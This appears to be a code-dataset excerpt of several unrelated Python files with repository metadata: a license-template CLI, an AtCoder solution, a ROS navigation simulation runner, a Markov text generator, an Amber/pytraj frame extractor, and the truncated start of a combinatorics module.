41b838c1916c793c834d6840367d6af260c3208a | 4,822 | py | Python | licensegh/licensegh.py | sauljabin/licensegh | 01dad5a8934869423feb9bc59854631ab1cb6e08 | [
"MIT"
] | null | null | null | licensegh/licensegh.py | sauljabin/licensegh | 01dad5a8934869423feb9bc59854631ab1cb6e08 | [
"MIT"
] | null | null | null | licensegh/licensegh.py | sauljabin/licensegh | 01dad5a8934869423feb9bc59854631ab1cb6e08 | [
"MIT"
] | null | null | null | import os
import re
import shutil
import git
import yaml
from rich import box
from rich.console import Console
from rich.prompt import Prompt
from rich.table import Table
class Licensegh:
    """Facade over the choosealicense template repository.

    Keeps a local clone of the templates up to date, indexes every license
    file in it, and offers listing, searching, printing and saving of
    license templates by id.
    """

    def __init__(self):
        self.repository = TemplatesRepository()
        self.licenses = []

    def init(self):
        """Synchronize the template repository and (re)index its licenses."""
        self.repository.init()
        self.load_licenses()

    def load_licenses(self):
        """Collect every ``*.txt`` template below the repository's license
        directory, sorted by file name within each directory."""
        for dirpath, dirnames, filenames in os.walk(self.repository.licenses_path):
            templates = sorted(
                filename for filename in filenames if filename.endswith(".txt")
            )
            for template in templates:
                self.licenses.append(License(os.path.join(dirpath, template)))

    def _find_by_exact_id(self, license_id):
        # Shared exact-id lookup; previously duplicated inline in
        # print_license_by_id and save_license_by_id.
        return [license for license in self.licenses if license_id == license.id]

    def print_all_licenses(self):
        """Print the id/name table of every indexed license."""
        self.print_licenses(self.licenses)

    def print_license_by_id(self, license_id):
        """Print the full text of the license whose id matches exactly, or
        an error message when no such license exists."""
        licenses = self._find_by_exact_id(license_id)
        if len(licenses) == 0:
            console = Console()
            console.print("[red]License not found[red]")
        else:
            licenses[0].load()
            licenses[0].print()

    def print_licenses_by_id(self, license_id):
        """List every license whose id contains *license_id*.

        NOTE: license_id is interpolated into a regular expression without
        escaping, so regex metacharacters act as such (and a malformed
        pattern raises re.error).
        """
        licenses = [
            license
            for license in self.licenses
            if re.match(".*({}).*".format(license_id), license.id)
        ]
        if len(licenses) == 0:
            console = Console()
            console.print("[red]Licenses not found[red]")
        else:
            self.print_licenses(
                licenses,
                True,
            )

    def print_licenses(self, licenses, print_description=False):
        """Render a rich table of the given licenses; optionally include
        each license's description under its name."""
        console = Console()
        table = Table(box=box.HORIZONTALS)
        table.add_column("Id", style="cyan", justify="right")
        table.add_column("Name", style="magenta")
        for license in licenses:
            license.load()  # name/description are loaded lazily from disk
            if print_description:
                table.add_row(
                    license.id,
                    "{}\n[white]{}[white]".format(license.name, license.description),
                )
            else:
                table.add_row(license.id, license.name)
        console.print(table)

    def save_license_by_id(self, license_id):
        """Fill in and write the license with exactly this id to ./LICENSE,
        or print an error message when no such license exists."""
        licenses = self._find_by_exact_id(license_id)
        if len(licenses) == 0:
            console = Console()
            console.print("[red]License not found[red]")
        else:
            licenses[0].load()
            licenses[0].save()

    def reset_repository(self):
        """Delete the local template clone; the next init() re-clones it."""
        self.repository.remove()
class License:
    """One license template backed by a choosealicense-style ``.txt`` file.

    Identity (id, file name, directory) is derived from the path at
    construction time; the textual content is read lazily via ``load()``.
    """

    def __init__(self, path):
        self.path = path
        self.directory, self.file_name = os.path.split(self.path)
        self.id = self.file_name.replace(".txt", "")
        # Content fields stay empty until load() parses the file.
        self.description = ""
        self.name = ""
        self.text = ""
        self.arguments = []

    def load(self):
        """Parse the YAML front matter and the license body out of the file."""
        with open(self.path, "r") as handle:
            raw = handle.read()
            # The front matter ends at the closing "---" (search starts past
            # the opening one at offset 3).
            boundary = raw.find("---", 3)
            front_matter = raw[:boundary]
            body = raw[boundary + 3 :]
            meta = yaml.safe_load(front_matter)
            self.description = meta["description"].strip()
            self.name = meta["title"].strip()
            self.text = body.strip()
            # Placeholders look like "[fullname]"; keep each one once.
            self.arguments = list(set(re.findall(r"\[([a-z]+)\]", self.text)))

    def print(self):
        """Render name, id and the full license text to the terminal."""
        term = Console()
        term.print(
            "[green]Name:[green]\t[magenta bold]{}[magenta bold]".format(self.name)
        )
        term.print(
            "[green]Id:[green]\t[magenta bold]{}[magenta bold]".format(self.id)
        )
        term.rule()
        # Escape "[" so rich does not treat license text as markup.
        term.print(self.text.replace("[", r"\["))

    def save(self):
        """Prompt for every placeholder and write the filled text to LICENSE."""
        filled = self.text
        for argument in self.arguments:
            answer = Prompt.ask(
                f"[magenta]Enter argument[magenta] [cyan]{argument}[cyan]"
            )
            filled = filled.replace(f"[{argument}]", answer)
        with open("LICENSE", "w") as handle:
            handle.write(filled)

    def __eq__(self, o):
        # Two licenses are the same template when their ids match.
        return self.id == o.id
class TemplatesRepository:
    """Local clone of github/choosealicense.com used as the template source."""

    def __init__(self):
        # Clone lives under the user's home; license templates sit in the
        # repository's "_licenses" directory.
        self.path = os.path.expanduser("~/.licensegh/choosealicense")
        self.licenses_path = os.path.join(self.path, "_licenses")
        self.remote = "https://github.com/github/choosealicense.com.git"

    def init(self):
        """Clone the remote on first use, otherwise pull the latest templates."""
        if not os.path.isdir(self.path):
            git.Repo.clone_from(self.remote, self.path)
        else:
            git.Repo(self.path).remotes.origin.pull()

    def remove(self):
        """Delete the local clone so the next init() starts from scratch."""
        shutil.rmtree(self.path)
| 29.950311 | 85 | 0.562837 | 549 | 4,822 | 4.812386 | 0.218579 | 0.037472 | 0.020818 | 0.039364 | 0.236563 | 0.202498 | 0.202498 | 0.202498 | 0.173732 | 0.173732 | 0 | 0.002708 | 0.310659 | 4,822 | 160 | 86 | 30.1375 | 0.792118 | 0 | 0 | 0.193798 | 0 | 0 | 0.094981 | 0.021775 | 0 | 0 | 0 | 0 | 0 | 1 | 0.131783 | false | 0 | 0.069767 | 0.007752 | 0.232558 | 0.124031 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
41bb07f1d7bec345e20d3accf21f60a21b94cceb | 192 | py | Python | ABC104/ABC104a.py | VolgaKurvar/AtCoder | 21acb489f1594bbb1cdc64fbf8421d876b5b476d | [
"Unlicense"
] | null | null | null | ABC104/ABC104a.py | VolgaKurvar/AtCoder | 21acb489f1594bbb1cdc64fbf8421d876b5b476d | [
"Unlicense"
] | null | null | null | ABC104/ABC104a.py | VolgaKurvar/AtCoder | 21acb489f1594bbb1cdc64fbf8421d876b5b476d | [
"Unlicense"
] | null | null | null | # ABC104a
import sys

# Competitive-programming boilerplate: fast reader + deep recursion limit.
input = sys.stdin.readline
sys.setrecursionlimit(10**6)

# ABC104 A: ratings below 1200 are rated for ABC, below 2800 for ARC,
# everything else for AGC.
rating = int(input())
if rating < 1200:
    contest = 'ABC'
elif rating < 2800:
    contest = 'ARC'
else:
    contest = 'AGC'
print(contest)
| 13.714286 | 28 | 0.609375 | 30 | 192 | 3.9 | 0.666667 | 0.051282 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.10596 | 0.213542 | 192 | 13 | 29 | 14.769231 | 0.668874 | 0.036458 | 0 | 0.181818 | 0 | 0 | 0.04918 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.090909 | 0 | 0.090909 | 0.272727 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
41be27ee6f0699ebf633e908194ed90a7940707d | 13,708 | py | Python | low_level_simulation/src/path_utilities/src/simulation_util.py | abiantorres/autonomous-vehicles-system-simulation | 3f0112036b2b270f5055729c648a1310976df933 | [
"Apache-2.0"
] | null | null | null | low_level_simulation/src/path_utilities/src/simulation_util.py | abiantorres/autonomous-vehicles-system-simulation | 3f0112036b2b270f5055729c648a1310976df933 | [
"Apache-2.0"
] | null | null | null | low_level_simulation/src/path_utilities/src/simulation_util.py | abiantorres/autonomous-vehicles-system-simulation | 3f0112036b2b270f5055729c648a1310976df933 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
import rosbag, rospy, actionlib, time, sys, csv, rospkg, re, os
from gazebo_msgs.msg import ModelState
from std_msgs.msg import Empty
from std_srvs.srv import Empty
from gazebo_msgs.srv import SetModelState
from geometry_msgs.msg import PoseArray
from move_base_msgs.msg import MoveBaseAction, MoveBaseGoal
from actionlib_msgs.msg import *
from obstacles_util import ObstaclesModelGenerator
from results_util import SimulationResults
from db_client import DBClient
# Path information messages
from costum_msgs.msg import SimulationMsg
import Tkinter
import tkMessageBox
class SimulationExecutor():
    """Drives repeated move_base navigation runs over a pre-recorded plan.

    The plan (initial model state + waypoint goals) is read from a rosbag.
    Obstacles are generated along each path segment, the robot is sent
    through the waypoints for ``n_iterations`` runs, and the aggregated
    results are published on /simulation_data, exported to CSV and stored
    through the database client.
    """

    def __init__(self):
        # Derive the CSV output directory from the 'navigation' ROS package
        # path: .../src/navigation -> .../csv/
        self.rospack = rospkg.RosPack()
        self.navigation_pkg_path = str(self.rospack.get_path('navigation'))
        self.csv_path = re.sub("navigation","", self.navigation_pkg_path)
        self.csv_path = re.sub("/src/","/csv/",self.csv_path)
        self.db_client = DBClient()
        # Get some parameters (private node parameters, set in the launch file)
        self.plan_file = rospy.get_param('~plan_file')
        self.n_iterations = int(rospy.get_param('~n_iterations'))
        self.distance_between_obstacles = \
            float(rospy.get_param('~distance_between_obstacles'))
        self.robot_radius = float(rospy.get_param('~robot_radius'))
        self.obstacle_length = float(rospy.get_param('~obstacle_length'))
        self.max_obstacle_shiftment = \
            float(rospy.get_param('~max_obstacle_shiftment'))
        self.timeout_factor = int(rospy.get_param('~timeout_factor'))
        self.max_robot_speed = float(rospy.get_param('~max_robot_speed'))
        self.simulation_data_pub = \
            rospy.Publisher('/simulation_data', SimulationMsg, queue_size=1)
        self.poseArray_publisher = rospy.Publisher('/waypoints', PoseArray, queue_size=1)
        self.frame_id = rospy.get_param('~goal_frame_id','map')
        # List of 2D points that describe the trajectory of the robot
        self.points_2d = []
        # Initial robot state
        self.initial_state = ModelState()
        # Trajectory goals
        self.waypoints = []
        # Get plan (fills initial_state, waypoints and points_2d from the bag)
        self.get_plan_from_file()
        # Build an obstacles model generator, seeded with the start point
        self.obstacles_model_generator = \
            ObstaclesModelGenerator("MySimulation", self.obstacle_length,\
            self.robot_radius, self.points_2d[0][0], self.points_2d[0][1],\
            self.distance_between_obstacles, self.max_obstacle_shiftment)
        i = 0
        # Append a segment per waypoint; index 0 is the initial pose and is
        # skipped because the generator already holds the start point.
        for point in self.points_2d:
            if(i != 0):
                self.obstacles_model_generator.append_point(\
                    str(i), point[0], point[1])
            i += 1
        self.n_segments = len(self.waypoints)
        # Build a results listener
        self.simulation_results_listener = \
            SimulationResults(self.n_segments, self.n_iterations)
        # Set some metadata for each segment
        for i in range(0, self.n_segments):
            # NOTE(review): the two branches below are identical when
            # evaluated at i == 0, so the special case is redundant; also the
            # trailing `i += 1` has no effect inside a `for` loop.
            if(i != 0):
                self.simulation_results_listener.set_segment_metadata(i, \
                    self.points_2d[i][0], self.points_2d[i][1], \
                    self.points_2d[i+1][0], self.points_2d[i+1][1], self.distance_between_obstacles, \
                    self.obstacles_model_generator.segments[i].get_segment_timeout(\
                    self.max_robot_speed, self.timeout_factor))
            else:
                self.simulation_results_listener.set_segment_metadata(0, \
                    self.points_2d[0][0], self.points_2d[0][1], \
                    self.points_2d[1][0], self.points_2d[1][1], self.distance_between_obstacles, \
                    self.obstacles_model_generator.segments[0].get_segment_timeout(\
                    self.max_robot_speed, self.timeout_factor))
            i += 1

    def reset_gazebo_world(self):
        # reset the gazebo world to the initial state
        rospy.wait_for_service('/gazebo/reset_world')
        reset_world = rospy.ServiceProxy('/gazebo/reset_world', Empty)
        try:
            res = reset_world()
        except rospy.ServiceException as exc:
            # Best effort: log and continue rather than abort the batch.
            rospy.loginfo("Service did not process request: " + str(exc))

    def set_vehicle_model_state(self):
        # Set the initial robot model state read from the plan bag
        rospy.wait_for_service('gazebo/set_model_state')
        set_model_state = rospy.ServiceProxy('gazebo/set_model_state', SetModelState)
        try:
            set_model_state(self.initial_state)
        except rospy.ServiceException as exc:
            rospy.loginfo("Service did not process request: " + str(exc))

    def get_plan_from_file(self):
        """
        Function with allows us to get a path pre-configured from file and
        load it to be used in the simulation.

        Reads two topics from the bag: 'initial_model_state' (one message,
        becomes self.initial_state) and 'path_goals_bag' (one message per
        waypoint).  Both also contribute a rounded (x, y) pair to points_2d,
        so points_2d has one more entry than waypoints.
        """
        self.waypoints = []
        self.points_2d = []
        # Read the ros bag file from ~/.ros/
        bag = rosbag.Bag(self.plan_file)
        # Get the robot initial state
        for topic, msg, t in bag.read_messages(topics=['initial_model_state']):
            self.initial_state = msg
            self.points_2d.append((round(float(msg.pose.position.x),2),\
                round(float(msg.pose.position.y),2)))
        # Get the trajectory goals
        for topic, msg, t in bag.read_messages(topics=['path_goals_bag']):
            self.waypoints.append(msg)
            self.points_2d.append((round(float(msg.pose.pose.position.x), 2),\
                round(float(msg.pose.pose.position.y),2)))
        bag.close()

    def convert_PoseWithCovArray_to_PoseArray(self):
        """Used to publish waypoints as pose array so that you can see them in rviz, etc."""
        poses = PoseArray()
        poses.header.frame_id = 'map'
        poses.poses = [pose.pose.pose for pose in self.waypoints]
        return poses

    def msg_to_csv(self, msg):
        """Export a SimulationMsg to a CSV report named <hash>_<date>.csv.

        The file stacks four sections, each introduced by its own header row:
        simulation metadata, per-segment metadata, global simulation results
        and per-segment results.
        """
        with open(self.csv_path + msg.metadata.simulation_hash + "_" + msg.metadata.date + ".csv", 'wb') as csvfile:
            fieldnames_global_segments_results = ['segment_index', 'n_failures', \
                'time_mean', 'time_stdev', \
                'time_max', 'time_min', \
                'distance_mean', 'distance_stdev', \
                'distance_max', 'distance_min', \
                'speed_mean', 'speed_stdev', \
                'speed_max', 'speed_min']
            fieldnames_global_simulation_results = ['n_failures', \
                'time_mean', 'time_stdev', \
                'time_max', 'time_min', \
                'distance_mean', 'distance_stdev', \
                'distance_max', 'distance_min', \
                'speed_mean', 'speed_stdev', \
                'speed_max', 'speed_min']
            fieldnames_segments_metadata = ['segment_index', 'initial_point', \
                'end_point', 'distance_between_obstacles', \
                'segment_simulation_timeout']
            fieldnames_simulation_metadata = ['simulation_hash', 'robot_file', \
                'world_file', 'plan_file', \
                'map_file', 'date', \
                'n_segments', 'n_iterations', \
                'timeout_factor', 'useful_simulation', \
                'local_planner', 'global_planner']
            # Simulation metadata
            writer = csv.DictWriter(csvfile, fieldnames=['Simulation metadata'], delimiter=';', quotechar='"')
            writer.writeheader()
            writer = csv.DictWriter(csvfile, fieldnames=fieldnames_simulation_metadata, delimiter=';', quotechar='"')
            writer.writeheader()
            # NOTE(review): 'useful_simulation' appears twice in this dict
            # literal; the duplicate is harmless (same value) but redundant.
            writer.writerow({'simulation_hash':msg.metadata.simulation_hash, 'robot_file':msg.metadata.robot_file, \
                'world_file':msg.metadata.world_file, 'plan_file':msg.metadata.plan_file, 'map_file':msg.metadata.map_file, \
                'date':msg.metadata.date, 'n_segments':msg.metadata.n_segments, \
                'n_iterations':msg.metadata.n_iterations, 'timeout_factor':msg.metadata.timeout_factor, \
                'useful_simulation':msg.metadata.useful_simulation, 'useful_simulation':msg.metadata.useful_simulation, \
                'local_planner':msg.metadata.local_planner, 'global_planner':msg.metadata.global_planner})
            # Segments metadata
            writer = csv.DictWriter(csvfile, fieldnames=['Segments metadata'], delimiter=';', quotechar='"')
            writer.writeheader()
            writer = csv.DictWriter(csvfile, fieldnames=fieldnames_segments_metadata, delimiter=';', quotechar='"')
            writer.writeheader()
            for i in msg.metadata.segments_metadata.segments_metadata:
                writer.writerow({'segment_index':i.segment_index, 'initial_point':i.initial_point, \
                    'end_point':i.end_point, 'distance_between_obstacles':i.distance_between_obstacles, \
                    'segment_simulation_timeout':i.segment_simulation_timeout})
            # Global Simulation Results
            writer = csv.DictWriter(csvfile, fieldnames=['Global simulation results'], delimiter=';', quotechar='"')
            writer.writeheader()
            writer = csv.DictWriter(csvfile, fieldnames=fieldnames_global_simulation_results, delimiter=';', quotechar='"')
            writer.writeheader()
            writer.writerow({'n_failures':msg.global_simulation_results.n_failures, \
                'time_mean':msg.global_simulation_results.time_mean, 'time_stdev':msg.global_simulation_results.time_stdev, \
                'time_max':msg.global_simulation_results.time_max, 'time_min':msg.global_simulation_results.time_min, \
                'distance_mean':msg.global_simulation_results.distance_mean, 'distance_stdev':msg.global_simulation_results.distance_stdev, \
                'distance_max':msg.global_simulation_results.distance_max, 'distance_min':msg.global_simulation_results.distance_min, \
                'speed_mean':msg.global_simulation_results.speed_mean, 'speed_stdev':msg.global_simulation_results.speed_stdev, \
                'speed_max':msg.global_simulation_results.speed_max, 'speed_min':msg.global_simulation_results.speed_min})
            # Global Segments Results
            writer = csv.DictWriter(csvfile, fieldnames=['Global segments results'], delimiter=';', quotechar='"')
            writer.writeheader()
            writer = csv.DictWriter(csvfile, fieldnames=fieldnames_global_segments_results, delimiter=';', quotechar='"')
            writer.writeheader()
            for i in msg.global_segments_results:
                writer.writerow({'segment_index':i.segment_index, 'n_failures':i.n_failures, \
                    'time_mean':i.time_mean, 'time_stdev':i.time_stdev, \
                    'time_max':i.time_max, 'time_min':i.time_min, \
                    'distance_mean':i.distance_mean, 'distance_stdev':i.distance_stdev, \
                    'distance_max':i.distance_max, 'distance_min':i.distance_min, \
                    'speed_mean':i.speed_mean, 'speed_stdev':i.speed_stdev, \
                    'speed_max':i.speed_max, 'speed_min':i.speed_min})
        tkMessageBox.showinfo('Results', "A CSV file has been generated behind the path "+self.csv_path + msg.metadata.simulation_hash + "_" + msg.metadata.date + ".csv")

    def start(self):
        """ Low level information publisher. High level should be
        subscribed to the simulation_data topic.
        """
        # Get a move_base action client
        client = actionlib.SimpleActionClient('move_base', MoveBaseAction)
        client.wait_for_server()
        # Start publishing goals
        for i in range(0, self.n_iterations):
            self.poseArray_publisher.publish(self.convert_PoseWithCovArray_to_PoseArray())
            # Initialize the simulation for each iteration
            self.reset_gazebo_world()
            self.set_vehicle_model_state()
            self.obstacles_model_generator.spawn_obstacles()
            time.sleep(3)
            for j in range(0, self.n_segments):
                # Build goal for segment j from the recorded waypoint
                goal = MoveBaseGoal()
                goal.target_pose.header.frame_id = self.frame_id
                goal.target_pose.header.stamp = rospy.Time.now()
                goal.target_pose.pose.position = self.waypoints[j].pose.pose.position
                goal.target_pose.pose.orientation = self.waypoints[j].pose.pose.orientation
                self.simulation_results_listener.start(j, i)
                # send the goal
                client.send_goal(goal)
                finished_within_time = client.wait_for_result(\
                    rospy.Duration(self.simulation_results_listener.segments_metadata[j].segment_simulation_timeout))
                # Check simulation state; a timeout or a non-SUCCEEDED status
                # records a failure and aborts the remaining segments.
                if not finished_within_time:
                    client.cancel_goal()
                    self.simulation_results_listener.stop(j, i, True)
                    break
                else:
                    state = client.get_state()
                    if state == GoalStatus.SUCCEEDED:
                        self.simulation_results_listener.stop(j, i, False)
                    else:
                        self.simulation_results_listener.stop(j, i, True)
                        break
            time.sleep(3)
        # Publish, export and persist the aggregated results of the batch.
        msg = self.simulation_results_listener.get_msg(\
            self.plan_file, self.timeout_factor)
        self.simulation_data_pub.publish(msg)
        self.msg_to_csv(msg)
        self.db_client.insert_simulation_results(msg)
| 55.723577 | 170 | 0.619273 | 1,537 | 13,708 | 5.251139 | 0.1581 | 0.05687 | 0.048445 | 0.041878 | 0.424731 | 0.322637 | 0.270103 | 0.220047 | 0.187337 | 0.147937 | 0 | 0.005444 | 0.276408 | 13,708 | 245 | 171 | 55.95102 | 0.808247 | 0.070032 | 0 | 0.223881 | 0 | 0 | 0.126747 | 0.015636 | 0 | 0 | 0 | 0 | 0 | 1 | 0.034826 | false | 0 | 0.069652 | 0 | 0.114428 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
41c495323f09d70b9547788b90e0defddbe36bbc | 2,371 | py | Python | plugins/intern/markov.py | rbracken/internbot | 58b802e0dd7597ace12acd9342bb938e2f33c25d | [
"BSD-2-Clause"
] | 1 | 2016-09-24T16:00:06.000Z | 2016-09-24T16:00:06.000Z | plugins/intern/markov.py | rbracken/internbot | 58b802e0dd7597ace12acd9342bb938e2f33c25d | [
"BSD-2-Clause"
] | null | null | null | plugins/intern/markov.py | rbracken/internbot | 58b802e0dd7597ace12acd9342bb938e2f33c25d | [
"BSD-2-Clause"
] | null | null | null | import random
""" Credits for this code go to Shabda Raaj, pulled from the article
'Generating pseudo-random text with Markov chains using Python',
which can be found at:
http://agiliq.com/blog/2009/06/generating-pseudo-random-text-with-markov-chains-u/ """
class Markov(object):
    """Word-level Markov chain text generator.

    NOTE(review): this is Python 2 code (it uses ``xrange``).
    """

    def __init__(self, open_file):
        # cache maps a (word1, word2) pair to the list of words that were
        # observed immediately after that pair in the source text.
        self.cache = {}
        self.open_file = open_file
        self.words = self.file_to_words()
        self.word_size = len(self.words)
        self.database()

    def file_to_words(self):
        """Return the whole file as a list of lowercase whitespace-split words."""
        self.open_file.seek(0)
        data = self.open_file.read()
        words = data.lower().split()
        return words

    def triples(self):
        """ Generates triples from the given data string. So if our string were
        "What a lovely day", we'd generate (What, a, lovely) and then
        (a, lovely, day).
        """
        if len(self.words) < 3:
            return
        for i in range(len(self.words) - 2):
            yield (self.words[i], self.words[i+1], self.words[i+2])

    def database(self):
        """Build the transition table (self.cache) from every word triple."""
        for w1, w2, w3 in self.triples():
            key = (w1, w2)
            if key in self.cache:
                self.cache[key].append(w3)
            else:
                self.cache[key] = [w3]

    def generate_markov_text(self, size=25):
        """Generate *size*+1 words starting from a random position.

        NOTE(review): randint(0, word_size-3) requires at least 3 loaded
        words, otherwise it raises ValueError.
        """
        seed = random.randint(0, self.word_size-3)
        seed_word, next_word = self.words[seed], self.words[seed+1]
        w1, w2 = seed_word, next_word
        gen_words = []
        for i in xrange(size):  # xrange: Python 2 only
            gen_words.append(w1)
            w1, w2 = w2, random.choice(self.cache[(w1, w2)])
        gen_words.append(w2)
        return ' '.join(gen_words)

    def generate_markov_response(self, seed_word=None, next_word=None, size=25):
        """Generate text seeded from the (seed_word, next_word) pair.

        If the chain walk fails (presumably a KeyError when the pair is not
        in the cache -- the bare except also hides any other error), it
        retries with the word that precedes next_word in the source text.
        """
        w1, w2 = seed_word, next_word
        gen_words = []
        try:
            for i in xrange(size):
                gen_words.append(w1)
                w1, w2 = w2, random.choice(self.cache[(w1, w2)])
            gen_words.append(w2)
        except:
            # NOTE(review): gen_words is not cleared before the retry, so any
            # words appended before the failure remain in the output.
            seed = self.words.index(next_word)
            seed_word = self.words[seed-1]
            w1, w2 = seed_word, next_word
            for i in xrange(size):
                gen_words.append(w1)
                w1, w2 = w2, random.choice(self.cache[(w1, w2)])
            gen_words.append(w2)
        return ' '.join(gen_words)
| 32.040541 | 90 | 0.557992 | 325 | 2,371 | 3.944615 | 0.298462 | 0.077223 | 0.065523 | 0.049922 | 0.359594 | 0.359594 | 0.359594 | 0.294072 | 0.265991 | 0.265991 | 0 | 0.033022 | 0.32307 | 2,371 | 73 | 91 | 32.479452 | 0.765732 | 0.061999 | 0 | 0.365385 | 0 | 0 | 0.001042 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.115385 | false | 0 | 0.019231 | 0 | 0.230769 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
41c53301d55d3133fde81eb12b2a9be32599efe5 | 3,590 | py | Python | isee/infrastructure/mdengine.py | team-mayes/isEE | c22d7cc78a43f0c0a7b2ec18fbc3b628ddef8d54 | [
"BSD-3-Clause"
] | null | null | null | isee/infrastructure/mdengine.py | team-mayes/isEE | c22d7cc78a43f0c0a7b2ec18fbc3b628ddef8d54 | [
"BSD-3-Clause"
] | 1 | 2021-09-17T18:20:36.000Z | 2021-10-06T16:56:34.000Z | isee/infrastructure/mdengine.py | team-mayes/isEE | c22d7cc78a43f0c0a7b2ec18fbc3b628ddef8d54 | [
"BSD-3-Clause"
] | null | null | null | """
Interface for MDEngine objects. New MDEngines can be implemented by constructing a new class that inherits from MDEngine
and implements its abstract methods.
"""
import abc
import os
import pytraj
import mdtraj
class MDEngine(abc.ABC):
    """
    Base interface that every supported molecular dynamics engine implements.

    Each engine-specific task isEE needs is declared here as an abstract
    method; concrete adapter classes supply the implementations.
    """

    @abc.abstractmethod
    def get_frame(self, trajectory, frame, settings):
        """
        Write a single frame of a trajectory out as an Amber .rst7 file.

        Parameters
        ----------
        trajectory : str
            Name of the trajectory file to extract the frame from
        frame : int
            Index of the frame to return; 1-indexed, -1 gives the last
            frame, 0 is invalid
        settings : argparse.Namespace
            Settings namespace object

        Returns
        -------
        last_frame : str
            Name of the .rst7-format coordinate file for the requested frame
            if it exists; an empty string otherwise
        """
        pass
class AdaptAmber(MDEngine):
    """
    Adapter class for Amber MDEngine.
    """

    def get_frame(self, trajectory, frame, settings):
        """Extract the frame'th frame of *trajectory* as an Amber .rst7 file.

        Returns the new file's name, or '' when the trajectory does not
        exist yet or has no frames.  Raises IndexError for an invalid or
        out-of-range frame index.
        """
        new_restart_name = trajectory + '_frame_' + str(frame) + '.rst7'
        if not os.path.exists(trajectory):
            return ''  # since it's possible to call this before the trajectory file has been initialized
        if frame >= 1:
            shift_frame = frame - 1  # because write_traj is 0-indexed but get_frame is 1-indexed
        elif frame == -1:
            shift_frame = -1
        else:
            raise IndexError('invalid frame index for get_frame: ' + str(frame) + ' (must be >= 1, or exactly -1)')
        # Use mdtraj to check for non-zero trajectory length (pytraj gives an error below if n_frames = 0)
        try:
            traj = mdtraj.load(trajectory, top=settings.topology)
            if traj.n_frames == 0:
                del traj
                return ''
        except ValueError:  # sometimes this is the result of trying to load a trajectory too early
            return ''
        traj = pytraj.iterload(trajectory, settings.topology)
        try:
            pytraj.write_traj(new_restart_name, traj, format='rst7', frame_indices=[shift_frame], options='multi', overwrite=True, velocity=True)
        except ValueError:  # pytraj raises a ValueError if frame index is out of range
            raise IndexError('frame index ' + str(frame) + ' is out of range for trajectory: ' + trajectory)
        except AssertionError:  # sometimes there's an assertion error when shift_frame = -1; cause unknown, but this fixes it
            if shift_frame == -1:
                # Retry with the explicit index of the last frame.
                shift_frame = traj.n_frames - 1
                try:
                    pytraj.write_traj(new_restart_name, traj, format='rst7', frame_indices=[shift_frame], options='multi',
                                      overwrite=True, velocity=True)
                except ValueError:  # pytraj raises a ValueError if frame index is out of range
                    raise IndexError('frame index ' + str(frame) + ' is out of range for trajectory: ' + trajectory)
        # With options='multi' pytraj appends '.1' to the file name; rename
        # to the expected name.  If neither name exists, the write failed.
        try:
            os.rename(new_restart_name + '.1', new_restart_name)
        except OSError:
            if not os.path.exists(new_restart_name):
                raise OSError('expected pytraj to write either ' + new_restart_name + ' or ' + new_restart_name + '.1, '
                              'but found neither.')
        return new_restart_name
| 39.888889 | 145 | 0.618106 | 443 | 3,590 | 4.918736 | 0.34763 | 0.041303 | 0.057825 | 0.022028 | 0.267095 | 0.251492 | 0.251492 | 0.216613 | 0.216613 | 0.216613 | 0 | 0.009204 | 0.3039 | 3,590 | 89 | 146 | 40.337079 | 0.862745 | 0.372145 | 0 | 0.304348 | 0 | 0 | 0.118015 | 0 | 0 | 0 | 0 | 0 | 0.021739 | 1 | 0.043478 | false | 0.021739 | 0.086957 | 0 | 0.26087 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
41c87d04befa3b08aff049a14265e8461d8d9c45 | 2,181 | py | Python | rubikscubennnsolver/combinatorial.py | dwalton76/rubiks-cube-NxNxN-solver | db42aeacca81366dba87ef475274ffb99645193d | [
"MIT"
] | 59 | 2017-04-29T15:19:29.000Z | 2022-03-18T22:17:20.000Z | rubikscubennnsolver/combinatorial.py | dwalton76/rubiks-cube-NxNxN-solver | db42aeacca81366dba87ef475274ffb99645193d | [
"MIT"
] | 44 | 2017-05-25T00:05:31.000Z | 2022-03-23T22:39:34.000Z | rubikscubennnsolver/combinatorial.py | dwalton76/rubiks-cube-NxNxN-solver | db42aeacca81366dba87ef475274ffb99645193d | [
"MIT"
] | 19 | 2017-06-17T00:32:47.000Z | 2021-12-18T00:03:56.000Z | """
https://en.wikipedia.org/wiki/Combinatorial_number_system
The code below is no longer used but am saving it for a rainy day
"""
# standard libraries
import math
from typing import List
def choose(a: int, b: int) -> int:
    """Return the binomial coefficient C(a, b), with 0 for out-of-range b.

    Bug fix: the original used float division ``int(x / y)`` on factorials,
    which silently loses precision once the factorials exceed 2**53 (e.g.
    choose(100, 50)).  Integer floor division is exact.

    >>> choose(23, 8)
    490314
    >>> choose(9, 6)
    84
    >>> choose(8, 5)
    56
